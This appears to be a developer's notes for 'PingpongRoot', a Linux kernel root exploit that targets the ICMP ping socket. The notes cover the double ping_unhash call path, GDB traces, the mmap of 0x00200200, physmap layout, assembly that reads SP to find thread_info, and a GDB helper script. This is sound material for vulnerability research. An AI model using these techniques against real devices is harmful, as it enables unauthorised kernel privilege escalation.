# PingpongRoot

## Breakpoint
Function involved

	1. inet_dgram_connect
	2. ip4_datagram_connect
	2. udp_disconnect
	3. ping_unhash
	4. sk_hashed(sk)
	5. ping_hash
	6. sock_get_timestampns
	7. inet_release

```
sk_hashed(sk): sk->sk_node->pprev
```
## Trace

	1. inet_dgram_connect (sock=0xedf67680 skc_node = {next = 0x72617473, 
        pprev = 0x0 <__vectors_start>}, skc_nulls_node = {next = 0x72617473, 
        pprev = 0x0 <__vectors_start>}}, skc_refcnt = {counter = 1})
    2. inet_autobind
    3. ping_get_port
    4. if (sk_unhashed) sock_hold(`increase refcnt`) and hlist_nulls_add_head(`sk_node == sk_nulls_node`)
	5. inet_dgram_connect (sock=0xedf67680, skc_node = {next = 0x3 <__vectors_start+2>, 
        pprev = 0xc04f4eb0 <ping_table+4>}, skc_nulls_node = {
        next = 0x3 <__vectors_start+2>, pprev = 0xc04f4eb0 <ping_table+4>}}, 
    	skc_refcnt = {counter = 2})
    6. udp_disconnect
    7. ping_unhash
    8. inet_dgram_connect
    9. udp_disconnect
    10. ping_unhash <-- Vulnerable
    11. sock_close->sock_release->inet_release

## System Configuration
`cat /proc/sys/vm/mmap_min_addr  32768`
mmap(0x00200200, PAGESIZE)

`cat /proc/sys/fs/nr_open         1048576`
getrlimit(RLIMIT_NOFILE, &rl)


## Linux socket
net/ipv4/af_inet.c
```
static struct inet_protosw inetsw_array[] =
{
	{
		.type =       SOCK_STREAM,
		.protocol =   IPPROTO_TCP,
		.prot =       &tcp_prot,
		.ops =        &inet_stream_ops,
		.no_check =   0,
		.flags =      INET_PROTOSW_PERMANENT |
			      INET_PROTOSW_ICSK,
	},

	{
		.type =       SOCK_DGRAM,
		.protocol =   IPPROTO_UDP,
		.prot =       &udp_prot,
		.ops =        &inet_dgram_ops,
		.no_check =   UDP_CSUM_DEFAULT,
		.flags =      INET_PROTOSW_PERMANENT,
       },

       { // Our Target
		.type =       SOCK_DGRAM,
		.protocol =   IPPROTO_ICMP,
		.prot =       &ping_prot,
		.ops =        &inet_dgram_ops,
		.no_check =   UDP_CSUM_DEFAULT,
		.flags =      INET_PROTOSW_REUSE,
       },

       {
	       .type =       SOCK_RAW,
	       .protocol =   IPPROTO_IP,	/* wild card */
	       .prot =       &raw_prot,
	       .ops =        &inet_sockraw_ops,
	       .no_check =   UDP_CSUM_DEFAULT,
	       .flags =      INET_PROTOSW_REUSE,
       }
};

struct proto ping_prot = {
	.name =		"PING",
	.owner =	THIS_MODULE,
	.init =		ping_init_sock,
	.close =	ping_close,
	.connect =	ip4_datagram_connect,
	.disconnect =	udp_disconnect,
	.setsockopt =	ip_setsockopt,
	.getsockopt =	ip_getsockopt,
	.sendmsg =	ping_sendmsg,
	.recvmsg =	ping_recvmsg,
	.bind =		ping_bind,
	.backlog_rcv =	ping_queue_rcv_skb,
	.hash =		ping_v4_hash,
	.unhash =	ping_v4_unhash,
	.get_port =	ping_v4_get_port,
	.obj_size =	sizeof(struct inet_sock),
};
```

## Physmap
PHYS_OFFSET and PAGE_OFFSET, which is assumed to be 16MiB aligned

### Using GDB
`PHYS_OFFSET = _text - mem_res[1].start = 0xc0000000`

Does it mean that the size of physmap is 2G?
`#define PFN_MAX		PFN_DOWN(0x80000000)`

## Note

Usually we need to go through two rounds to get a proper memory region. Still some mystery need to be resolved oneday.

### Get register SP
It seems like the following version of getting SP does not work due to compiler bug. ???
```
static inline struct thread_info *current_thread_info(void)
{
	register unsigned long sp asm ("sp");
	return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
}
```

Instead, I tried to directly use assembly code to get SP.

```
static inline struct thread_info *
current_thread_info(void)
{
  unsigned long sp;
  __asm ( "mov %[result], SP"
          : [result] "=r" (sp)
          : 
  );
  // register unsigned long sp asm ("sp");
  return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
}
```

### Utility

GDB Helper

```
target remote :1234
b sock_get_timestampns
set $addr = 0
define get
if $addr != sk
	set $addr = sk
	c
end
end 
c
```